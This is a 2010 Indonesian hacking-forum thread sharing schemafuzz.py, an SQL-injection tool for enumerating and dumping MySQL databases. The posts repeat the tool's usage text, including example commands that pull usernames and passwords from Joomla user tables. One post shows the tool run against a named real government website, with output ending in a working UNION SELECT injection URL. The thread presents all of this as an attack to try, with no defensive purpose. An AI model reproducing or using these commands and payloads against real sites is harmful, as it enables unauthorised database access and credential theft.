IBC forum
Would you like to react to this message? Create an account in a few clicks or log in to continue.

We never stop to like computer

Latest topics
» Purchasing Tag Heuer Watches on a Budget
Tua oke... Icon_minitimeMon Mar 20, 2017 9:17 pm by fitch65221023

» Tag Heuer Gets A Taste
Tua oke... Icon_minitimeMon Mar 20, 2017 9:11 pm by fitch65221023

» U.s. Remains World's Top Platinum Watch Market
Tua oke... Icon_minitimeWed Dec 28, 2016 8:54 pm by fitch65221023

» The U.S. platinum watch market saw some other notable trends
Tua oke... Icon_minitimeWed Dec 28, 2016 8:50 pm by fitch65221023

» Do You Love Luxury Panerai Watches?
Tua oke... Icon_minitimeWed Dec 28, 2016 8:46 pm by fitch65221023

» Aqua Master Watches for this Christmas Season
Tua oke... Icon_minitimeWed Dec 28, 2016 8:40 pm by fitch65221023

» A Guide To Womens Watches: Styles And Types
Tua oke... Icon_minitimeThu Nov 10, 2016 9:25 pm by fitch65221023

» Aqua Master Diamond Watches For Women
Tua oke... Icon_minitimeThu Nov 10, 2016 9:09 pm by fitch65221023

» A Luxury Watch To Celebrate Achievements
Tua oke... Icon_minitimeMon Sep 12, 2016 10:03 pm by fitch65221023

IBC chat

ShoutMix chat widget
Navigation
 Portal
 Index
 Memberlist
 Profile
 FAQ
 Search

Tua oke...

3 posters

IBC forum :: Hacking

Go down

Tua oke... Empty Tua oke...

Post  g34rboxxx Tue Jun 08, 2010 7:58 pm

schemafuzz.pl .... find in google ..


Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot
]com darkc0de.com
Modes:
Define: --dbs Shows all databases user has access too.
MySQL v5+
Define: --schema Enumerate Information_schema Database.
MySQL v5+
Define: --full Enumerates all databases information_schema table
MySQL v5+
Define: --dump Extract information from a Database, Table and Column.
MySQL v4+
Define: --fuzz Fuzz Tables and Columns.
MySQL v4+
Define: --findcol Finds Columns length of a SQLi
MySQL v4+
Define: --info Gets MySQL server configuration only.
MySQL v4+

Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0
de,3,4"

Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."

Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.
txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump
mode.

Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4"
Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,dark
c0de,3,4"
Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D catalog -T orders -r 200
Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4" -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4" -end "/*" -o sitelog.txt
Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"
Try it .... and feel it ....
g34rboxxx
g34rboxxx
Admin

Posts : 250
Join date : 2009-10-19
Age : 47
Location : Tebak hayooo

Back to top Go down

Tua oke... Empty Re: Tua oke...

Post  vailo Tue Jun 08, 2010 9:29 pm

g34rboxxx wrote:schemafuzz.pl .... find in google ..


Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot
]com darkc0de.com
Modes:
Define: --dbs Shows all databases user has access too.
MySQL v5+
Define: --schema Enumerate Information_schema Database.
MySQL v5+
Define: --full Enumerates all databases information_schema table
MySQL v5+
Define: --dump Extract information from a Database, Table and Column.
MySQL v4+
Define: --fuzz Fuzz Tables and Columns.
MySQL v4+
Define: --findcol Finds Columns length of a SQLi
MySQL v4+
Define: --info Gets MySQL server configuration only.
MySQL v4+

Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0
de,3,4"

Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."

Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.
txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump
mode.

Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4"
Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,dark
c0de,3,4"
Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D catalog -T orders -r 200
Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4" -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4" -end "/*" -o sitelog.txt
Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"
Try it .... and feel it ....

affraid affraid affraid what d'....?! deskripsi nan penjelasannya pilzzz... bounce bounce bounce
vailo
vailo

Posts : 137
Join date : 2009-10-18

Back to top Go down

Tua oke... Empty Re: Tua oke...

Post  g34rboxxx Tue Jul 06, 2010 4:19 pm


Use python ...bisa di win32/linux..
Buka cmd .... jangan lupa install dulu pythonnya ....download dari mbah google ya ....
Razz Razz Razz ....trus buka seperti ini ...


C:\Python26>python.exe schemafuzz.py -h

tekan enter hasilnya


Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot
]com darkc0de.com
Modes:
Define: --dbs Shows all databases user has access too.
MySQL v5+
Define: --schema Enumerate Information_schema Database.
MySQL v5+
Define: --full Enumerates all databases information_schema table
MySQL v5+
Define: --dump Extract information from a Database, Table and Column.
MySQL v4+
Define: --fuzz Fuzz Tables and Columns.
MySQL v4+
Define: --findcol Finds Columns length of a SQLi
MySQL v4+
Define: --info Gets MySQL server configuration only.
MySQL v4+

Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0
de,3,4"

Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."

Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.
txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump
mode.

Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4"
Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,dark
c0de,3,4"
Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,d
arkc0de,3,4" -D catalog -T orders -r 200
Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4" -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4" -end "/*" -o sitelog.txt
Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"

contoh :
C:\Python26>python.exe schemafuzz.py --findcol -u "http://bplhd.jakarta.go.id/beritadetail.php?&idg=-1"

hasilnya

Code:

| rsauron[@]gmail[dot]com                                v5.0  |
|  6/2008      schemafuzz.py                                  |
|      -MySQL v5+ Information_schema Database Enumeration      |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                        |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

[+] URL: http://bplhd.jakarta.go.id/beritadetail.php?&idg=-1--
[+] Evasion Used: "+" "--"
[+] 15:57:29
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,6,7,
[+] Column Length is: 8
[+] Found null column at column #: 1
[+] SQLi URL: http://bplhd.jakarta.go.id/beritadetail.php?&idg=-1+AND+1=2+UNION+
SELECT+0,1,2,3,4,5,6,7--
[+] darkc0de URL: http://bplhd.jakarta.go.id/beritadetail.php?&idg=-1+AND+1=2+UN
ION+SELECT+0,darkc0de,2,3,4,5,6,7
[-] Done!
g34rboxxx
g34rboxxx
Admin

Posts : 250
Join date : 2009-10-19
Age : 47
Location : Tebak hayooo

Back to top Go down

Tua oke... Empty Re: Tua oke...

Post  sinax89 Mon Jul 26, 2010 1:44 pm

wah.... ini teknik yang pake darcode... sya pernah coba ..!! memang ampuh nie scrip schemafuzz.py..... jadi teringat masa lalu... hehe...
sinax89
sinax89
Admin

Posts : 72
Join date : 2009-10-13
Age : 34
Location : Bekasi

https://ibc-forum.forumotion.com

Back to top Go down

Tua oke... Empty Re: Tua oke...

Post  Sponsored content


Sponsored content


Back to top Go down

Back to top

IBC forum :: Hacking

 
Permissions in this forum:
You cannot reply to topics in this forum